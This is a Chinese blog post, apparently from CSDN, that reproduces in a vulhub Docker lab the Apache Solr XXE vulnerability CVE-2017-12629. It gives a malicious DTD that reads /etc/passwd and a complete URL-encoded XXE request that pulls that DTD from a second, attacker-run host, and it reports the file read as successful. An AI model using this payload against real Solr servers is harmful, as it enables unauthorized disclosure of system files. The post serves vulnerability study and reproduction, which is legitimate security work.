Apache solr XML 实体注入漏洞(CVE-2017-12629)

最新推荐文章于 2024-04-01 17:37:24 发布
最新推荐文章于 2024-04-01 17:37:24 发布
阅读量929 收藏 3
点赞数
分类专栏: 中间件漏洞复现 文章标签: solr apache 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/109958574
版权

声明

好好学习,天天向上

漏洞描述

Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629。

影响范围

Apache Solr < 7.1
Apache Lucene < 7.1(很多组件都用到这个,比如ES)

复现过程

这里使用7.0.1版本

使用vulhub

cd /app/vulhub-20201028/solr/CVE-2017-12629-RCE

使用docker启动

docker-compose up -d

启动后可访问IP:8983,需要稍等一会哦

我这里的思路是,先构造一个站点,放置dtd文件(里面写执行的代码),然后用solr去包含这个dtd站点路径,就会自动读取dtd文件中的文件路径

构造dtd文件站点,使用phpstudy

创建1.dtd,dtd文件内容如下

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % ent "<!ENTITY data SYSTEM ':%file;'>">

在这里插入图片描述

访问solr服务,触发我们的dtd文件,浏览器输入如下payload,里面的IP和文件名称根据实际情况修改,我的solr是192.168.239.170,文件名称是1.dtd

http://192.168.239.129:8983/solr/demo/select?&q=%3C%3fxml+version%3d%221.0%22+%3f%3E%3C!DOCTYPE+root%5b%3C!ENTITY+%25+ext+SYSTEM+%22http%3a%2f%2f192.168.239.170%2f1.dtd%22%3E%25ext%3b%25ent%3b%5d%3E%3Cr%3E%26data%3b%3C%2fr%3E&wt=xml&defType=xmlparser

成功读取passwd

在这里插入图片描述

使用完后关闭镜像

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
02Apache solr XML 实体注入漏洞CVE-2017-12629
千寻的博客
03-23 1324
>漏洞复现的思路: >* 1、先构造一个站点,放置dtd文件(里面写要执行的代码), >* 2、用solr去包含这个dtd站点,就会自动读取dtd文件中的文件路径
Apache Solr 远程命令执行漏洞 CVE-2017-12629 漏洞复现
ADummy的博客
02-27 342
Apache Solr 远程命令执行漏洞CVE-2017-12629) by ADummy 0x00利用路线 ​ Burpsuite发送两个包,一个listener,一个update—>命令执行 0x01漏洞介绍 ​ Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之
Apache solr XML&RCE 漏洞(CVE-2017-12629)
weixin_44047654的博客
02-22 639
Apache Solr XXE & RCE 漏洞(CVE-2017-12629)
Apache Solr 漏洞总结
星落的博客
04-15 1829
Apache Solr简介 Solr是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。Solr是一个独立的企业级搜索应用服务器,很多企业运用solr开源服务。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。它的主要特性包括:高效、灵活的缓存功能,垂直搜索功能,高亮显示搜索结果,通过索引复制来提高可用性,提 供一套强大Data Schema来定义字段,类型和设置文本分析,提供基于Web的管理界面等。 环境搭建 ..
solr_exploit:Apache Solr远程代码执行突破(CVE-2019-0193)漏洞利用
03-10
此处提供的漏洞检测方法,文件等内容,均仅限于安全从业者在获得法律授权的情况下使用,目的是检测已授权的服务器的安全性。安全从业者遵守法律规定,禁止在没有得到授权的情况下做任何突破检测。 简介 理论上可以...
CVE-2020-13957 Apache Solr 未授权上传.md
04-13
CVE-2020-13957 Apache Solr 未授权上传
Apache Solrsolr-8.11.1-src.tgz)
01-10
标题中的"solr-8.11.1-src.tgz"表明这是Apache Solr 8.11.1版本的源代码包,适用于那些希望对Solr进行深度定制或开发的用户。 源代码发布通常包含了编译和构建Solr所需的所有文件,包括Java源代码、配置文件、测试...
apache-solr-1.4.0.zip_apache-solr _apache-solr-1.4.0_apache-solr
09-20
在压缩包"apache-solr-1.4.0"中,包含了Solr的源代码、配置文件、示例文档以及其他必要的资源。对于喜欢研究Solr的人来说,这些源代码是深入理解其工作原理、定制功能以及优化性能的重要资料。通过对这些源码的研究...
vulhub中Apache solr XML 实体注入漏洞复现(CVE-2017-12629
最新发布
yougexiaojiuguan的博客
04-01 730
漏洞复现过程的记录
CVE-2017-12629Apache Solr XXE&&RCE
qq_61553520的博客
05-13 902
pache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE)。漏洞影响版本:Apache Solr before 7.1 with Apache Lucene before 7.1。
漏洞复现】Apache系列(二)之Solr漏洞复现
qq_45244158的博客
03-01 7358
漏洞复现】Apache系列(二)之Solr漏洞复现
cve-2017-12629 apache solr xxe & rce 漏洞分析
whatday的专栏
06-26 2016
Versions Affected Apache Solr before 7.1.0 with Apache Lucene before 7.1 Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Description Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查
Apache Solr 远程命令执行漏洞复现(CVE-2017-12629
0xSec
12-26 952
Solr 是基于 Lucene 的面向企业搜索的 web 应用 ,Solr 是一个独立的企业级搜索应用服务器。它对外提供类似于 Web-service 的 API 接 口。用户可以通过 http 请求,向搜索引擎服务器提交一定格式的 XML 文件,生成索引;也 可以通过 Http Get 操作提出查找请求,并得到 xml/json 格式的返回结果。Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。
CVE-2017-12629Apache Solr RCE命令执行漏洞复现
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
02-16 4405
当攻击者可以直接访问Solr控制台时,可以通过发送类似/节点名/config的POST请求对该节点的配置文件做更改.apache solr默认继承VelocityResponseWriter插件.Apache solr远程命令执行(CVE-2019-0193).
宝塔漏洞复现
热门推荐
黑白的博客
09-06 1万+
声明 好好学习,天天向上 漏洞描述 宝塔面板是一款服务器管理软件,支持windows和linux系统,可以通过Web端轻松管理服务器,提升运维效率。例如:创建管理网站、FTP、数据库,拥有可视化文件管理器,可视化软件管理器,可视化CPU、内存、流量监控图表,计划任务等功能 该漏洞是phpmyadmin未鉴权,可通过特定地址直接登录数据库的漏洞 影响范围 宝塔Linux面板7.4.2版本 宝塔Linux测试版7.5.13 Windows面板6.8版本 复现过程 漏洞镜像可以用docker获取 先配置加速器(公
Apache Solr 7.4官方指南:全面配置与管理教程
Apache Solr Reference Guide 7.4 是由 Apache Lucene/Solr 项目编写的官方英文文档,于2018年6月19日发布,旨在提供全面和权威的指南,帮助用户深入了解和管理 Solr 7.4 版本。该手册覆盖了从基础概念到高级操作的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值